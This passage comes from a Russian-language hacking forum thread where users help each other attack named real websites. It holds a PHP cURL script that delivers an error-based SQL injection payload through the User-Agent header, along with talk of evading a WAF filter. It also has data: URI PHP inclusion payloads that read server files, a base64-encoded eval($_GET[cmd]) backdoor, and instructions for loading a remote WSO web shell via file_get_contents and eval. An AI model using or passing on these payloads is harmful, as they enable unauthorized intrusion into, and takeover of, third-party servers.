Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Нашел скуль в User-Agent, запросы через GET обрубаются

    <h1>Forbidden</h1>
    <p>You don't have permission to access on this server.</p>

    поделитесь скриптом на php, для передачи User-Agent в Post-запросе. Сам написать не могу, знаний маловато
     
    #22661 er9j6@, 25 Oct 2013
    Last edited: 25 Oct 2013
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23

    нужен скрипт на php, в этих прогах скулю в User-Agent постом не получается передать
     
  3. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    User-Agent - это не пост, это заголовок. Он передаётся и при GET и при POST запросах.


    PHP:
    <?php
    $curl 
    curl_init('http://site.ru/'); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1);
    curl_setopt($curlCURLOPT_POST1);
    curl_setopt($curlCURLOPT_USERAGENT'Firefox(user-agent)');
    echo 
    curl_exec($curl);
    ?>
    ПС Но похоже тебе это не поможет :(
     
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    как сюда уязвимый запрос правильно вставить?

    <?php
    $curl = curl_init('http://www.site.ru/');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_USERAGENT, ''and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'');
    echo curl_exec($curl);
    ?>
     
  5. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Верно. Я пропустил одну строчку в оригинале =(

    PHP:
    <?php
    $curl 
    curl_init('http://localhost/phpinfo.php'); 
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
    curl_setopt($curlCURLOPT_POST1); 
    curl_setopt($curlCURLOPT_POSTFIELDS"");
    curl_setopt($curlCURLOPT_USERAGENT'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and');
    echo 
    curl_exec($curl);
    ?>
    Попробуй так
     
  6. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Скрипт работает правильно, но версию не выводит, хотя при GET запросе вывод есть Duplicate column name '5.1.68-log' , дальше продвинутся не удается , все фильтруется. Выводить таблицы нужно через POST-запрос
     
  7. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Я видимо не совсем понимаю о чём речь. Этот скрипт как раз делает то что ты попросил, POST запрос с возможностью редактировать User-Agent.

    Если тебе нужно отправить какие-то параметры POST'ом то
    Если это всё не то, то приведи пример запроса.
     
  8. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    Выкладываю

    GET http://www.guppik.ru/components/com_true/sub_votepic.php?id=1&user_rating=1 HTTP/1.1
    Host: www.guppik.ru
    User-Agent: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'


    теперь нужно это переделать под POST-запрос, для вывода таблиц
     
  9. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Ок, теперь всё ясно. Ещё раз повторю что User-Agent это заголовок, POST/GET на него не влияют. В данном случае WAF/IPS/... режет запросы в которых есть совпадение '*informa*'. Я минут десять потыкался, но рабочего варианта послать information_schema в User-Agent не нашёл.
     
    1 person likes this.
  10. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    И снова вопрос по site/account?mode==data:;base64,<?php include("http://site/path/file.*"); ?> с этим я разобрался,могу просматривать любые файлы и папки кроме файлов *.php ,как открыть php
     
    #22670 noviks, 26 Oct 2013
    Last edited: 26 Oct 2013
  11. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    site/account?mode==data:;base64,<?php echo file_get_contents("http://site/path/file.php"); ?>

    PS Только сейчас понял, путь-то надо указывать не с веба, а локальный. По типу:

    site/account?mode==data:;base64,<?php echo file_get_contents("/var/www/path/file.php"); ?>
     
    #22671 Ganz Euler, 26 Oct 2013
    Last edited: 26 Oct 2013
  12. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    работает что так <?php echo file_get_contents("http://site/path/file.php"); ?>
    что так <?php echo file_get_contents("/var/www/path/file.php"); ?>
    но файлы php не xочет показать
     
  13. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Что значит не хочет? Что пишет?
     
  14. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    ничего не пишет просто страница до конца не открывается и пусто
     
  15. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Ок, моя последняя догадка: возможно файлы читаются, но просто не отображаются в браузере. Попробуй посмотреть HTML код страницы(ctrl+f '<?').
     
  16. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    :D я об зтом сразу подумал, HTML код просто обрывается
     
  17. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    открыл /bin/sh но там одни крокозябры
     
  18. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Неудивительно, /bin/sh бинарный файл.

    Если хочешь скинь сюда или в ЛС ссылку. http://go.jetswap.com/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtjbWRdKTsgPz4==&cmd=phpinfo%28%29; у меня не работает, пишет down.
     
  19. noviks

    noviks New Member

    Joined:
    23 Oct 2013
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    она уже и не работает ,вчера зря спалил :D
     
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ну раз дыру закрыли, разсказую, вобще не понимаю чё вы так долго там думали,

    этот кусок тут вобще не нужен был &cmd=phpinfo%28%29;

    также как и PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==( в басе64 зашифрован код <?php eval($_GET[cmd]); ?>)


    банально заливаете на другой серв код шелла, потом пишете код $a = file_get_contents("http://site.ru/wso.txt"); eval($a);

    и усё, видите перед собой ваш шелл, там кругом права урезаны были, одни лишь папка была для записи cache
     
Thread Status:
Not open for further replies.